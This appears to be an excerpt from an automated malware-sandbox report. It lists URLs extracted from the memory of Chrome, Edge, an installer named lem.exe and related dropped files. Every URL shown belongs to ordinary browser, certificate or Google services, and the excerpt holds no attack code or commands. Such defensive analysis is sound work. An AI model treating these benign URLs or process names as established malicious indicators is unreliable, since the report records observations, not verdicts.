                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5750
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2758252832.000054E0003A8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2865793489.0000510404780000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2886763892.000051040482C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5881
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5901
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2758252832.000054E0003A8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2865793489.0000510404780000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2886763892.000051040482C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5906
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6041
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2865793489.0000510404780000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6048
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2865793489.0000510404780000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6141
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6248
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2865793489.0000510404780000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6439
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6651
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2865793489.0000510404780000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6692
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6755
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6860
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6876
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2865793489.0000510404780000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6878
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6929
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6953
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7036
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7047
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7172
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7279
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7370
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7406
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2758252832.000054E0003A8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2865793489.0000510404780000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2886763892.000051040482C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7488
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2865793489.0000510404780000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7553
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2865793489.0000510404780000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7556
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7724
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7761
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8162
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8215
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2865793489.0000510404780000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8229
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8280
                Source: lem.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                Source: lem.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                Source: lem.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                Source: lem.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: chrome.exe, 00000011.00000002.2693836696.000051D80020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://clients2.google.com/time/1/current
                Source: chrome.exe, 00000011.00000002.2695161383.000051D800654000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
                Source: Subtle.9.dr, Inf.com.2.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                Source: Subtle.9.dr, Inf.com.2.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                Source: Subtle.9.dr, Inf.com.2.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                Source: Subtle.9.dr, Inf.com.2.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                Source: Subtle.9.dr, Inf.com.2.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                Source: lem.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: lem.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                Source: lem.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                Source: lem.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: lem.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                Source: chrome.exe, 00000011.00000002.2693037132.000051D800076000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://google.com/
                Source: msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://issuetracker.google.com/200067929
                Source: chrome.exe, 00000011.00000003.2615532276.000051D8010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2613239460.000051D800F10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2616293329.000051D8010E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2616126954.000051D800F60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jsbin.com/temexa/4.
                Source: lem.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: lem.exeString found in binary or memory: http://ocsp.digicert.com0
                Source: lem.exeString found in binary or memory: http://ocsp.digicert.com0A
                Source: lem.exeString found in binary or memory: http://ocsp.digicert.com0C
                Source: lem.exeString found in binary or memory: http://ocsp.digicert.com0X
                Source: Subtle.9.dr, Inf.com.2.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                Source: Subtle.9.dr, Inf.com.2.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                Source: Subtle.9.dr, Inf.com.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                Source: Subtle.9.dr, Inf.com.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                Source: chrome.exe, 00000011.00000003.2615532276.000051D8010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2613239460.000051D800F10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2696287556.000051D80095B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2616293329.000051D8010E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2618312497.000051D80120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2618312497.000051D801264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2616126954.000051D800F60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2618170710.000051D80100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2617923428.000051D800F04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2618046250.000051D800F98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2615959644.000051D801118000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2617969978.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2617902560.000051D800CBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/AUTHORS.txt
                Source: chrome.exe, 00000011.00000002.2693836696.000051D80020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
                Source: chrome.exe, 00000011.00000002.2693836696.000051D80020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
                Source: chrome.exe, 00000011.00000002.2692880330.000051D80000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000002.2762439498.000054E000020000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000002.2937100541.000051040458C000.00000004.00000800.00020000.00000000.sdmp, manifest.json.27.drString found in binary or memory: https://chromewebstore.google.com/
                Source: chrome.exe, 00000011.00000002.2697276538.000051D800C10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2609596103.000051D800C0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromium-i18n.appspot.com/ssl-aggregate-address/
                Source: chrome.exe, 00000011.00000002.2693776369.000051D8001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/
                Source: chrome.exe, 00000011.00000002.2693776369.000051D8001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/g
                Source: chrome.exe, 00000011.00000003.2596264640.000006F8002EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2596226146.000006F8002E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
                Source: chrome.exe, 00000011.00000002.2695703721.000051D8007D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695136498.000051D800644000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2605228304.000051D800498000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695281946.000051D8006B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2696287556.000051D800944000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2696138738.000051D8008E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2692880330.000051D80000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000002.2762439498.000054E000020000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000002.2935675519.0000510404440000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.27.drString found in binary or memory: https://clients2.google.com/service/update2/crx
                Source: chrome.exe, 00000011.00000002.2696423318.000051D800984000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
                Source: chrome.exe, 00000011.00000002.2696423318.000051D800984000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
                Source: chrome.exe, 00000011.00000002.2695787632.000051D80080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
                Source: chrome.exe, 00000011.00000002.2693776369.000051D8001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync
                Source: chrome.exe, 00000011.00000002.2693776369.000051D8001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync/event
                Source: chrome.exe, 00000011.00000002.2695161383.000051D800654000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
                Source: Inf.com, 0000000D.00000002.3279538912.0000000004741000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 0000000D.00000002.3277634519.0000000004605000.00000004.00000800.00020000.00000000.sdmp, LNOHDB.13.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: Inf.com, 0000000D.00000002.3279538912.0000000004741000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 0000000D.00000002.3277634519.0000000004605000.00000004.00000800.00020000.00000000.sdmp, LNOHDB.13.drString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                Source: chrome.exe, 00000011.00000002.2699759554.000051D80136C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
                Source: 2cc80dabc69f58b6_0.27.dr, Reporting and NEL.28.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                Source: chrome.exe, 00000011.00000002.2694171038.000051D80030C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.goog
                Source: chrome.exe, 00000011.00000002.2694171038.000051D80030C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.googl0
                Source: manifest.json0.27.drString found in binary or memory: https://docs.google.com/
                Source: chrome.exe, 00000011.00000002.2697390661.000051D800C54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2698496579.000051D800E9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/
